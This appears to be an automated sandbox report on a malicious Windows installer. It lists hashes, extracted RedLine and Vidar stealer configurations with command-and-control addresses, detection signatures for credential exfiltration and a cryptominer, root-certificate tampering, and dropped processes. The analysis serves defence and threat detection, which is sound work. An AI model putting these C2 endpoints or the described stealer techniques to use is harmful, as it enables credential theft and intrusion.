Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Analysis
-
max time kernel
96s -
max time network
1828s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
12-09-2021 18:05
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
General
-
Target
setup_x86_x64_install.exe
-
Size
3.5MB
-
MD5
1b5154bc65145adba0a58e964265d5f2
-
SHA1
5a96fd55be61222b3e6438712979dc2a18a50b8c
-
SHA256
c48cd55efee57f0b7ff4547a0a20ebfbdf4188d059512b10a29879bf30c4fc19
-
SHA512
9465da97b0986fef660e3f7725b4d4c034bef677acbe36382d95a8052c54634f004162aa3f105156e503af1b26632e47e44234ef9825b388260a6bcd310a5026
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
redline
pab123
45.14.49.169:22411
Extracted
redline
UTS
45.9.20.20:13441
Extracted
vidar
40.5
328
https://gheorghip.tumblr.com/
-
profile_id
328
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2520 2424 rundll32.exe 62 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1620 2424 rundll32.exe 62 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3784 2424 rundll32.exe 62 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral3/memory/1676-198-0x0000000002C10000-0x0000000002C2F000-memory.dmp family_redline behavioral3/memory/1676-212-0x0000000003170000-0x00000000058DE000-memory.dmp family_redline behavioral3/memory/1676-225-0x0000000002C50000-0x0000000002C6E000-memory.dmp family_redline behavioral3/memory/2632-242-0x00000000003A0000-0x00000000003BF000-memory.dmp family_redline behavioral3/memory/2632-253-0x0000000002BF0000-0x0000000002C0E000-memory.dmp family_redline behavioral3/memory/2632-258-0x0000000003180000-0x00000000058ED000-memory.dmp family_redline -
Socelars Payload 3 IoCs
resource yara_rule behavioral3/files/0x0003000000013117-116.dat family_socelars behavioral3/files/0x0003000000013117-183.dat family_socelars behavioral3/files/0x0003000000013117-171.dat family_socelars -
resource yara_rule behavioral3/memory/1676-268-0x0000000003170000-0x00000000058DE000-memory.dmp redline -
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral3/memory/1744-188-0x0000000000400000-0x00000000017F2000-memory.dmp family_vidar behavioral3/memory/2060-354-0x0000000000400000-0x00000000017F4000-memory.dmp family_vidar -
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral3/memory/952-347-0x00000001402F327C-mapping.dmp xmrig behavioral3/memory/952-349-0x0000000140000000-0x0000000140763000-memory.dmp xmrig -
resource yara_rule behavioral3/files/0x00030000000130e8-76.dat aspack_v212_v242 behavioral3/files/0x00030000000130e8-77.dat aspack_v212_v242 behavioral3/files/0x00030000000130e7-78.dat aspack_v212_v242 behavioral3/files/0x00030000000130e7-79.dat aspack_v212_v242 behavioral3/files/0x00030000000130ea-82.dat aspack_v212_v242 behavioral3/files/0x00030000000130ea-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 28 IoCs
pid Process 1728 setup_installer.exe 1544 setup_install.exe 1744 Sun05ac1b0207d3ff3b8.exe 2040 Sun05532f7abc.exe 1596 Sun059375dac544fc4a.exe 1716 Sun054fe19a12cb3.exe 1676 Sun052bbd8bebd9.exe 1740 Sun05640630a6aa.exe 1540 Sun05fa3b4d2ae56e.exe 112 Sun05d60bc3b96248e5.exe 288 Sun054fe19a12cb3.tmp 736 Sun05899db881f67fb29.exe 748 LzmwAqmV.exe 2192 conhost.exe 2252 PublicDwlBrowser1100.exe 2268 2.exe 2484 46807GHF____.exe 2348 setup.exe 2632 udptest.exe 2680 setup_2.exe 2716 3002.exe 2744 setup_2.tmp 2792 3002.exe 2852 jhuuee.exe 2876 setup_2.exe 2932 BearVpn 3.exe 3012 setup_2.tmp 2224 services64.exe -
Loads dropped DLL 64 IoCs
pid Process 1824 setup_x86_x64_install.exe 1728 setup_installer.exe 1728 setup_installer.exe 1728 setup_installer.exe 1728 setup_installer.exe 1728 setup_installer.exe 1728 setup_installer.exe 1544 setup_install.exe 1544 setup_install.exe 1544 setup_install.exe 1544 setup_install.exe 1544 setup_install.exe 1544 setup_install.exe 1544 setup_install.exe 1544 setup_install.exe 432 cmd.exe 432 cmd.exe 936 cmd.exe 936 cmd.exe 1828 cmd.exe 2024 cmd.exe 1744 Sun05ac1b0207d3ff3b8.exe 1744 Sun05ac1b0207d3ff3b8.exe 1508 cmd.exe 1508 cmd.exe 788 cmd.exe 1716 Sun054fe19a12cb3.exe 1716 Sun054fe19a12cb3.exe 1988 cmd.exe 1988 cmd.exe 1656 cmd.exe 1088 cmd.exe 1676 Sun052bbd8bebd9.exe 1676 Sun052bbd8bebd9.exe 1740 Sun05640630a6aa.exe 1740 Sun05640630a6aa.exe 1716 Sun054fe19a12cb3.exe 112 Sun05d60bc3b96248e5.exe 112 Sun05d60bc3b96248e5.exe 288 Sun054fe19a12cb3.tmp 288 Sun054fe19a12cb3.tmp 288 Sun054fe19a12cb3.tmp 748 LzmwAqmV.exe 748 LzmwAqmV.exe 748 LzmwAqmV.exe 748 LzmwAqmV.exe 748 LzmwAqmV.exe 748 LzmwAqmV.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 288 Sun054fe19a12cb3.tmp 2384 WerFault.exe 748 LzmwAqmV.exe 748 LzmwAqmV.exe 2348 setup.exe 2528 rundll32.exe 2528 rundll32.exe 2528 rundll32.exe 2528 rundll32.exe 748 LzmwAqmV.exe 2632 udptest.exe 2632 udptest.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1226 ipinfo.io 1271 ipinfo.io 13 ip-api.com 904 ipinfo.io -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup_2.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 2384 112 WerFault.exe 48 2504 2268 WerFault.exe 59 3000 1744 WerFault.exe 52 -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2220 schtasks.exe 1824 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3640 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 3604 taskkill.exe 3868 taskkill.exe 2060 taskkill.exe 2452 taskkill.exe 2780 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BearVpn 3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e BearVpn 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun05d60bc3b96248e5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun05d60bc3b96248e5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun05ac1b0207d3ff3b8.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 9 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 50 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 1076 powershell.exe 1076 powershell.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2384 WerFault.exe 2192 conhost.exe 3000 WerFault.exe 3000 WerFault.exe 3000 WerFault.exe 3000 WerFault.exe 3000 WerFault.exe 3000 WerFault.exe 3000 WerFault.exe 3000 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 2504 WerFault.exe 3012 setup_2.tmp 3012 setup_2.tmp -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 1596 Sun059375dac544fc4a.exe Token: SeCreateTokenPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeAssignPrimaryTokenPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeLockMemoryPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeIncreaseQuotaPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeMachineAccountPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeTcbPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeSecurityPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeTakeOwnershipPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeLoadDriverPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeSystemProfilePrivilege 112 Sun05d60bc3b96248e5.exe Token: SeSystemtimePrivilege 112 Sun05d60bc3b96248e5.exe Token: SeProfSingleProcessPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeIncBasePriorityPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeCreatePagefilePrivilege 112 Sun05d60bc3b96248e5.exe Token: SeCreatePermanentPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeBackupPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeRestorePrivilege 112 Sun05d60bc3b96248e5.exe Token: SeShutdownPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeAuditPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeSystemEnvironmentPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeChangeNotifyPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeRemoteShutdownPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeUndockPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeSyncAgentPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeEnableDelegationPrivilege 112 Sun05d60bc3b96248e5.exe Token: SeManageVolumePrivilege 112 Sun05d60bc3b96248e5.exe Token: SeImpersonatePrivilege 112 Sun05d60bc3b96248e5.exe Token: SeCreateGlobalPrivilege 112 Sun05d60bc3b96248e5.exe Token: 31 112 Sun05d60bc3b96248e5.exe Token: 32 112 Sun05d60bc3b96248e5.exe Token: 33 112 Sun05d60bc3b96248e5.exe Token: 34 112 Sun05d60bc3b96248e5.exe Token: 35 112 Sun05d60bc3b96248e5.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeDebugPrivilege 2268 2.exe Token: SeDebugPrivilege 2384 WerFault.exe Token: SeDebugPrivilege 2932 BearVpn 3.exe Token: SeDebugPrivilege 2192 conhost.exe Token: SeDebugPrivilege 3000 WerFault.exe Token: SeDebugPrivilege 2504 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1824 wrote to memory of 1728 1824 setup_x86_x64_install.exe 29 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1728 wrote to memory of 1544 1728 setup_installer.exe 30 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 1068 1544 setup_install.exe 32 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 432 1544 setup_install.exe 33 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 1508 1544 setup_install.exe 34 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 936 1544 setup_install.exe 35 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 788 1544 setup_install.exe 36 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1828 1544 setup_install.exe 37 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 1544 wrote to memory of 1656 1544 setup_install.exe 53 PID 432 wrote to memory of 1744 432 cmd.exe 52
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1824 -
